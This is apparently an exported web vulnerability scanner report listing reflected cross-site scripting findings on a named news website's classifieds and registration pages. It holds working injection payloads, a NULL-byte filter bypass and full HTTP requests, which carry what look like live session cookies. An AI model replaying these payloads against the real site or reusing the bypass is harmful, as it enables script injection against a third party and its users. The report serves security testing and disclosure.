The value of the layoutColumns request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 781c5"%3balert(1)//60a11eacb02 was submitted in the layoutColumns parameter. This input was echoed as 781c5";alert(1)//60a11eacb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s30z2n1 Vary: Accept-Encoding Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 18:53:59 GMT Connection: close Content-Length: 9210
//player atrributes var playerAvailable = "&playerAvailable=true"; var searchAvailable = "&searchAvailable=false"; var layoutColumns = "&layoutColumns=1781c5";alert(1)//60a11eacb02"; var carouselType = "&carouselType=horz"; var titleAvailable = "&titleAvailable=true"; var autoPlay = "&autoPlayVideo=false";
The value of the listType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 348b6"%3balert(1)//ad28c45f11e was submitted in the listType parameter. This input was echoed as 348b6";alert(1)//ad28c45f11e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s27z1n1 Vary: Accept-Encoding Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 18:53:59 GMT Connection: close Content-Length: 9210
<html> <head>
</head> <body style="margin:0px;"> <script src="/hive/javascripts/video-tool.js" type="text/javascript"></script> <script src="/hive/javascripts/AC_OETag ...[SNIP]... yer atrributes var playerAvailable = "&playerAvailable=true"; var searchAvailable = "&searchAvailable=false"; var layoutColumns = "&layoutColumns=1"; var carouselType = "&carouselType=horz348b6";alert(1)//ad28c45f11e"; var titleAvailable = "&titleAvailable=true"; var autoPlay = "&autoPlayVideo=false";
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0096499"><script>alert(1)</script>d30646ceac2 was submitted in the class parameter. This input was echoed as 96499"><script>alert(1)</script>d30646ceac2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /classified/genmerch/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=1486%2C+32100%0096499"><script>alert(1)</script>d30646ceac2&class=1489%2C+32300&class=1492%2C+32200&days=7&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s27z1n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 19:03:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 125331
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the days request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f323b"><script>alert(1)</script>47f559738f9 was submitted in the days parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/genmerch/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=8400%2C+40760&days=7f323b"><script>alert(1)</script>47f559738f9&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s28z2n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 19:02:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 120755
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.20. http://www.latimes.com/classified/genmerch/results.classified [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.latimes.com
Path:
/classified/genmerch/results.classified
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94dc0"><script>alert(1)</script>da0e2def822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/genmerch/results.classified?class=1730%2C%2010450&94dc0"><script>alert(1)</script>da0e2def822=1 HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s27z1n1 Cache-Control: private, max-age=271 Date: Sun, 12 Dec 2010 19:00:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109406
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4446f"><script>alert(1)</script>17df8f96b33 was submitted in the class parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/realestate/rentals/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=6005-6060%2C+55011%2C+55020%2C+55030%2C+55032%2C+550344446f"><script>alert(1)</script>17df8f96b33&days=7&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s27z2n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 19:00:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 136354
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the days request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ed67"><script>alert(1)</script>8093fc9f1fb was submitted in the days parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/realestate/rentals/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=6005-6060%2C+55011%2C+55020%2C+55030%2C+55032%2C+55034&days=74ed67"><script>alert(1)</script>8093fc9f1fb&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s30z2n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 19:00:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 136340
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.23. http://www.latimes.com/classified/realestate/rentals/results.classified [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.latimes.com
Path:
/classified/realestate/rentals/results.classified
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca4"><script>alert(1)</script>cfde8c47090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/realestate/rentals/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=6005-6060%2C+55011%2C+55020%2C+55030%2C+55032%2C+55034&days=7&date=all&a3ca4"><script>alert(1)</script>cfde8c47090=1 HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s30z1n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 19:01:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 136220
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae19"><script>alert(1)</script>49051fb6d3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services7ae19"><script>alert(1)</script>49051fb6d3c/site/registration/logout.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s29z2n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101444
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1005d"><script>alert(1)</script>ed4fc37d7f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site1005d"><script>alert(1)</script>ed4fc37d7f5/registration/logout.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; 